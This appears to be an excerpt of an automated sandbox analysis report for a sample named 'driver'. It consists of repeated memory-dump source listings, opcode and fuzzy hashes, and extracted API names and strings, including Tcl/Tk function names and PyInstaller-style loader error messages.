                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                • Instruction ID: 6defe4e2d673c17e62b55b8aaab878379c257bb8249b4bdce645552e58f115fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F516476E596518AE7688B2AC04423837A0EB55F6CF244231CE4D977DACFBAF843D740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                • Instruction ID: 2306c8a34213a9612777a8cd8360abea726588627feed3ef37b810c75fb433be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2851A536A596518AE7248B2AC04023833A0EB48F6CF644135CE4D977E6DFBAFC43DB54
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                • Instruction ID: a127e8c8f482204a9d6992f0b861145c2e31b5b1116cd56820a4db5ba2abb2c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D518676A596528AE7248B2AD05023837A0EB49F5CF244131DE4D87796CFBAFC43D748
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                • Instruction ID: 188020f3ae1795624f7eab1ca551673fa16b2bc81950928636fbdabf1f18661a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1651B436A9A6518AE7248B2AC04033837A1EB49F5CF644131DE4C977A6CF7AFC53E744
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                • Instruction ID: 8acfb3682054348317041491ed1d2189e9741e6262db0a0670bb2c066a561280
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73518676E5965189E724CB2AC44023937A0EB55F6CF244132CE4D977AACFBAFC42D740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                • Instruction ID: 81653ffcde6cb21d61442bcafb382d0349f4bb269b2835a36511de5ded52deae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D051A136A5E6518AE7288B2AD04023C27A1EB44F5CF245131CE4D97796CF7AFC53E784
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                • Instruction ID: cc49b1db6ca56a80d85efcc3eaf19be91c34f19d120cc1ba5b70b5e101f47834
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA41DBE2C8B74E5CF965892A09147B85680DF62FAAD5852B0DD9DF33C3DD8C3987D101
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                • Instruction ID: 13c49d6db9892a2184a92605dfb6d4f1fb06fdcfcfe720855f619d89f78daac0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23411232719A5486EF08CF2BDA141B9B3A1BB48FD8B099032DE4DD7B59DE7CD5419300
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                • Instruction ID: d7f7466a57967364049ad6695683a524282600ee8934d86edcad7a222d072b7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B31F432B4AB4285E7659F22A44413E66D4BB84FD4F044238EA4D93BD6DF7CE402A304
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                • Instruction ID: b02a20728d05f5bcfd1f868d1a3bcd1540173dab6b6c3c988f1fe32e428f42a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF068717592958ADBD8DF69A40262A77D4FB487C4F808039E58DC3B04DEBCD0619F04
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                • Instruction ID: 97a0fbf5ebaae34f6a8e3fd8e3dd5779c2eb728897efb57adcf3efa3f7f6377a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8A0022298EC0AD0F6448B02ECA41352371FB61B4CB400035E10EC50B39FBCE400F310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction ID: 616c99a6fb8ce4113730a897815d4c5eee867979b0081abeb44ab7417fc0096e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE02B321ACFB07D1FA549B67E8605B422A1BF08F5DF850135D41E822A7EFBCF148B260
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6A29B88A7,?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B821C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                • Instruction ID: c5dae3934ef6882ee404ad6c9267fd937729bb3f5562b0bdf3f77c849e5be53d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE51B611E9F64281FB509B23E8512BA6291FF98F8CF444031DA0EC66D7EEBCE505A750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction ID: f841521467dec36c14412b2d2a1a9119f7ad6c047c0435c8b8533868c6e05486
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA511826608BA186E6349F22E4181BAB7A1F798B65F004135EFDE83795DF7CD045EB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction ID: 38752fc627e6edc8395127885aa685957748e0d74624daf422a93771f6423d40
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B621A621B8BA4282F7418B7BE8541796291FF88F98F484230DA2DC33D7DEACD591A201
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
